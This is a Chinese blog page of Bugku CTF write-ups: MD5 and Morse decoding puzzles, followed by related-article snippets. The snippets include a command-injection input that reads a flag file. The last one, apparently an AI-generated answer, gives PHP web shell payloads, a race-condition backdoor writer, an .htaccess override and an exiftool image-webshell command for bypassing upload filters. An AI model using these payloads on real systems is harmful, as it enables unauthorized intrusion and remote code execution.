4b43b0aee35624cd95b910189b3dc231
c4ca4238a0b923820dcc509a6f75849b
8277e0910d750195b448797616e091ad
b14a7b8059d9c055954c92674ce60032
cfcd208495d565ef66e7dff9f98764da
8fa14cdd754f91cc6554c9e71929cce7
b14a7b8059d9c055954c92674ce60032
6f8f57715090da2632453988d9a1501b
8277e0910d750195b448797616e091ad
e4da3b7fbbce2345d7772b0674a318d5
cbb184dd8e05c9709e5dcaedaa0495cf

这是md5加密,

MD5(Message-Digest Algorithm 5)是一种广泛使用的密码散列函数,由 Ronald Rivest 在 1991 年设计。它可以产生一个 128 位(16 字节)的哈希值,通常呈现为一个 32 位的十六进制数字字符串。

核心概念:哈希函数

要深入 MD5 ,理解哈希函数的概念至关重要:

  1. 单向性:从输入数据可以轻松计算哈希值,但从哈希值几乎不可能反推出原始数据。

  2. 确定性:相同的输入永远会产生相同的哈希值。

  3. 雪崩效应:输入的微小改变(哪怕只改一个比特)会导致输出的哈希值发生巨大、不可预测的变化。

  4. 抗碰撞性:很难找到两个不同的输入产生相同的哈希值。

MD5 正是这样一种哈希函数。

MD5 的特征

  • 输出长度:固定为 128 位(16 字节)。

  • 输出表示:通常是一个 32 字符的十六进制字符串

  • 使用 十六进制 字符集。

  • 具体包括:

    • 数字: 0 1 2 3 4 5 6 7 8 9

    • 小写字母: a b c d e f

MD5 算法工作原理(简化版)

MD5 的处理过程相当复杂,但可以简化为以下几个步骤:

  1. 填充

    • 对输入消息进行填充,使其长度在对 512 取模后的余数等于 448。

    • 填充方式:第一位填充 1,其余位填充 0。

  2. 添加长度

    • 在填充后的消息后附加一个 64 位的字段,表示原始消息的长度(以比特为单位)。

    • 至此,消息的总长度恰好是 512 位的整数倍。

  3. 初始化变量

    • 使用四个 32 位的链接变量(A, B, C, D),它们被初始化为固定的常数:

      • A = 0x67452301

      • B = 0xEFCDAB89

      • C = 0x98BADCFE

      • D = 0x10325476

  4. 处理消息块

    • 将填充后的消息分割成多个 512 位的块。

    • 对每个 512 位块进行四轮主循环,每轮循环包含 16 次操作。

    • 每轮操作都使用一个非线性函数(F, G, H, I)和一组常数。

    • 操作包括位运算(与、或、非、异或)和循环左移

  5. 输出

    • 处理完所有块后,将最终的 A, B, C, D 链接变量连接起来,形成一个 128 位的哈希值。

    • 通常以小端字节序输出为 32 位的十六进制字符串。

MD5 的用途

尽管已不安全,MD5 在过去和现在的一些非安全关键场景中仍有应用:

  1. 数据完整性校验

    • 下载文件时,网站通常会提供 MD5 校验和。用户下载后计算本地文件的 MD5,与官方提供的对比,一致则说明文件完整无误。

    • 示例file.zip 的 MD5 是 d41d8cd98f00b204e9800998ecf8427e

  2. 数字签名

    • 对消息的哈希值进行签名,而非对消息本身,效率更高(现在应使用更安全的哈希算法如 SHA-256)。

  3. 密码存储(已过时且危险)

    • 早期系统会在数据库存储用户密码的 MD5 值而非明文。登录时比对哈希值。

    • 重要绝对不要在新项目中使用 MD5 存储密码

  4. 生成唯一标识符

    • 用于为大量数据生成一个相对唯一的 key。

回答题目,直接在线解密即可

flag为flag{We1c0me_t0_the_w0r1d_0f_md5}

4,你以为是md5吗

打开附件:

密文为bci177a7a9c7udf69c248647b4dfc6fd84o

题目提示MD5,但它和普通的MD5并不一致,仔细观察后我们可以发现他有一些不属于MD5的字符,前文对MD5的介绍中我们提到过MD5的密文是 32 字符的十六进制字符串并由a-f,0-9组成的。

而本题的密文为35位且有不属于MD5的字符,那我们考虑删掉那些不属于MD5的字符,得到:

bc177a7a9c7df69c248647b4dfc6fd84

刚好32位!说明我们的思路没有问题,在线解密

flag为flag{666666666666}

5,easy_crypto

打开附件:

密文为 0010 0100 01 110 1111011 11 11111 010 000 0 001101 1010 111 100 0 001101 01111 000 001101 00 10 1 0 010 0 000 1 01111 10 11110 101011 1111101

它给了我们几组2进制字符,因为排列规律很眼熟所以怀疑是摩斯,在线解密

得到:

flag%u7bm0rse_code_1s_interest1n9!%u7d

flag为flag{m0rse_code_1s_interest1n9!}

Bugku-Misc合集
似水流年
08-28 1960
#Misc – Bugku(合集)# ##链接## ###签到### 扫描二维码关注公众号 即可获得flag flag{Bugku-Sec-pwn!} ###这是一张单纯的图片### 链接 将文件1.jpg放入Winhex 在文件尾部看到一串数字 &#107;&#101;&#121;&#123;&#121;&#111;&#117;&#32;&#97;&#114;&#101;&#32;&#114;&amp
Bugku-杂项-合集
多崎巡礼的博客
11-22 1299
一、签到题: 扫码关注公众号 得到flag :flag{BugKu-Sec-pwn!} 二、这是一张那个单纯的图片: 图片另存为,winhex打开,最下面一串转义序列,utf-8编码 https://uni2ascii.supfree.net/ 在线转码 三、隐写 下载解压得到图片,winhex打开 修改键值 高01改成11即可 四、telnet 下载,使用wireshark打开,...
bugku合集1
xtrws的博客
10-24 1101
摘要:本文分享了多道CTF密码题的解题思路,这些题目涉及多种加密技术,包括零宽隐写、栅栏密码和Brainfuck相关变形等,展示了CTF竞赛中常见的密码学挑战。
Bugku CTF 合集
l_OMl_l的博客
07-30 717
1.打开靶场,发现是文件上传,查看源码,发现本关会将上传的 jpg,png 后缀的文件以 python 运行后返回结果。本关打开靶场后发现没有任何可利用数据,所以直接查看源代码,使用 ctrl+f 查询 flag 直接获取flag。1.打开靶场,翻译得知需要输入一个flag作为参数,检查源代码,发现可以设置 secret key 作为变量。4.将 ls 换为 cat 添加 flag 路径,查看 flag 的内容,获取 flag。1.打开靶场,发现这关依旧需要以 flag 作为参数,源码中没有提示。
BugKu WP 合集
Chmaz的博客
05-27 946
BugKu MISC&Crypto 题解合集
Crypt的bugku合集
weixin_65204980的博客
12-04 137
接着,我们需要对密文调整每行字符串密文第一个字符H,第一行则变为:HGVSFUWIKPBELNACZDTRXMJQOY密文第二个字符C,第二行则变为:CPMNZQWXYIHFRLABEUOTSGJVDK以此类推.........构成--需要根据密钥将14行字符串调整顺序第一行是原来的第二行,第二行是原来的第五行,以此类推.......得到重新排列的字符。)是一种表单替换密码,通过对字母数值进行简单的乘法和加法方程运算,而得到另一个与其对应的字母,从而进行加密;通过钥匙二再解得到flag。
bugku SQL注入题目合集
xuchen16的博客
09-30 2815
转载自:http://www.northity.com/2018/06/12/Bugku%E9%A2%98%E7%9B%AE%E9%9B%86%E9%94%A60x02/ SQL注入题目合集 这是一个神奇的登陆框 传送门 在用户名的后面加一个\可以看到报错,应该是能够报错注入或者联合查询之类的 但是最近学到了一些骚套路,先来看看sqlmap sqlmap 直接burp抓包另存为一个t...
BugKu Web渗透之login2
cai_huaer的博客
09-02 299
7.于是猜测,flag是一个文件,继续回到之前的进程监控系统的页面,输入143.0.0.0 | cat flag > 6.txt,再去http://117.72.52.127:12643/6.txt页面查看,发现已经显示了flag。6.继续回到之前的进程监控系统的页面,输入143.0.0.0 | ls ./flag > 2.txt,再打开http://117.72.52.127:12643/2.txt 查看,并没有发现内容。必定返回最后数据,为 2,md5后的111。启动场景,进入页面,是一个登录页面。
Bugku -分析-合集
热门推荐
多崎巡礼的博客
11-19 1万+
一、flag被盗 http筛选 选中一个post包,追踪tcp数据流 得到flag
bugku题目(带WP)
qq274575499的博客
06-11 932
CTF题型,带WP。根据给出的题目,找到flag。
bugku bp
03-15
好的,我需要帮助用户查找与BugKu平台相关的BP(Burp Suite)文件或渗透测试资源,并结合蓝队资源。首先,用户提到的引用中有关于蓝队安全测试和渗透测试的内容,尤其是引用[2]和[4]提到了文件上传、下载、包含漏洞...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8799
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
区块链的基石:深入解析哈希指针与链表数据结构
友莘居士的博客
10-21 672
区块链本质上是一种特殊的链表结构,采用密码学哈希指针替代传统内存地址指针。每个区块包含区块头(含前一区块的哈希值)和区块体(交易数据),通过哈希指针形成不可篡改的链条。哈希函数的特性确保数据完整性——任何篡改都会改变哈希值,导致后续链断裂。相比普通链表,区块链具有分布式、防篡改、共识机制等特点,在去中心化网络中通过加密算法和激励模型维护数据安全。理解这种"加密链表"结构是掌握区块链不可篡改、可追溯特性的关键基础。
CTF密码学简介
xtrws的博客
10-24 261
密码学题目强调逻辑性,需结合理论与实践逐步突破。
common-logging-3.3.10-sources.jar
10-25
common-logging-3.3.10-sources.jar
s3tables-jvm-1.5.28-sources.jar
10-25
s3tables-jvm-1.5.28-sources.jar
工业控制系统的无线安全
最新发布
10-25
本书深入探讨了工业控制系统(ICS)中无线技术的集成与安全挑战。随着智能电网等关键基础设施的升级,无线通信因其灵活性、低成本和高可用性被广泛应用。然而,无线引入的同时也带来了新的网络与物理威胁。文章分析了主流无线技术如WirelessHART、ISA100.11a、ZigBee、蓝牙、微波和卫星在ICS中的应用场景,并系统梳理了针对这些系统的被动监听、主动攻击、密钥管理缺陷、干扰和电池耗尽等安全威胁。基于ITU和NIST的安全架构,书中提出了涵盖机密性、认证、完整性、访问控制、可用性和问责性的核心防护机制。此外,通过佛罗里达国际大学智能电网测试平台的案例研究,展示了无线技术在广域监控、孤岛检测与恢复等实际场景中的集成方法与优化策略。本书为工程师和研究人员提供了将无线技术安全融入ICS的理论框架与实践指南,是推动关键基础设施现代化与安全保障的重要参考。
transcribe-jvm-1.4.83-javadoc.jar
10-25
transcribe-jvm-1.4.83-javadoc.jar
基于Golang开发的MySQL到MySQL轻量级多线程库表级数据同步工具-支持全量同步与增量同步-自动断点续传与容错恢复-多线程高性能数据复制-基于binlog解析的实时数据同步.zip
10-25
基于Golang开发的MySQL到MySQL轻量级多线程库表级数据同步工具_支持全量同步与增量同步_自动断点续传与容错恢复_多线程高性能数据复制_基于binlog解析的实时数据同步.zip上传一个【C++】VIP资源
bugku Upload 2
07-29
<think>嗯,用户正在询问Bugku平台文件上传问题的解决方法。从对话历史看,用户可能遇到了类似文件上传绕过或安全限制的挑战。 用户提供的引用信息很有价值。引用1提到使用短标签<?=eval($_POST['a']);echo 'b';>绕过<?php过滤,引用2则展示了使用<script language='php'>标签替代传统PHP标记的方法。引用3则提供了条件竞争攻击的思路,利用文件上传后到删除前的时间差。 需要给用户提供实用的绕过技巧。首先考虑常见的文件类型检查绕过方法,比如双扩展名(.php.png)或特殊字符截断。然后处理内容过滤,短标签和<script>标签都是有效的替代方案。对于条件竞争场景,要解释如何用Burp Suite持续发送请求来维持文件访问。 安全问题也很重要。必须提醒用户这些方法仅适用于CTF练习环境,真实系统使用可能违法。还要强调上传后立即删除的必要性,避免留下后门文件。 最后考虑设计相关问题来帮助用户深入理解。可以包括其他绕过技术、检测方法、日志清理技巧以及真实场景中的防御措施。这些问题应该覆盖技术细节和伦理考量,形成完整的知识框架。 在回复中会保持技术细节的准确性,同时确保所有绕过方法都有实际操作的可行性。对于条件竞争攻击,会详细说明时间窗口的利用方式。整个回复要突出实用性和安全性平衡。</think>针对Bugku平台文件上传问题的解决方法,结合常见绕过技巧和引用案例,整理以下核心方案: ### 一、绕过文件类型检测 1. **双扩展名绕过** 尝试上传文件名为 `shell.php.png` 或 `shell.php.jpg` *原理*:部分系统仅检查最后一个扩展名 *引用验证*:如引用[2]所述,通过双后缀绕过图片检测 [^2] 2. **MIME类型伪造** 修改HTTP请求头: ```http Content-Type: image/png // 实际文件内容为PHP ``` 3. **特殊字符截断** 利用`%00`截断(需PHP<5.3.4): ```shell shell.php%00.jpg ``` --- ### 二、绕过内容过滤 1. **短标签替代**(引用[1]方案) 使用 `<?=` 代替 `<?php`: ```php <?=eval($_POST['a']);?> ``` *适用场景*:当服务器开启`short_open_tag`时 2. **非标准PHP标签**(引用[2]方案) ```php <script language='php'>system('ls');</script> ``` 3. **十六进制编码** ```php \x3c\x3f\x3d\x65\x76\x61\x6c(...) // <?=eval(...) 的十六进制形式 ``` --- ### 三、条件竞争利用(引用[3]) 当系统先上传后删除时: 1. 上传生成后门的文件: ```php <?php fputs(fopen('shell.php','w'),'<?php eval($_GET[1]);?>');?> ``` 2. 使用Burp Suite**持续并发请求**: - 线程1:循环上传文件 - 线程2:循环访问 `target.com/shell.php` *关键*:利用文件上传后到删除前的毫秒级时间窗 --- ### 四、防御规避技巧 1. **图片马注入** 生成含PHP代码的图片: ```bash exiftool -Comment='<?=eval($_POST[a]);?>' image.jpg ``` 2. **.htaccess覆盖** 上传包含以下内容的`.htaccess`: ```apache AddType application/x-httpd-php .png // 将png解析为PHP ``` --- ### 五、连接后门建议 1. 使用 **蚁剑/AntSword** 连接(引用[1][2]): - 配置POST参数:`a=system('ls');` - 注意避开`<?php`等敏感字符检测 2. 若返回为空:尝试 **Base64编码输出**: ```php <?=base64_encode(system('ls'));?> ``` > **重要提醒**:以上方法仅限CTF合法环境使用,实际网站渗透需获得授权[^1][^2][^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值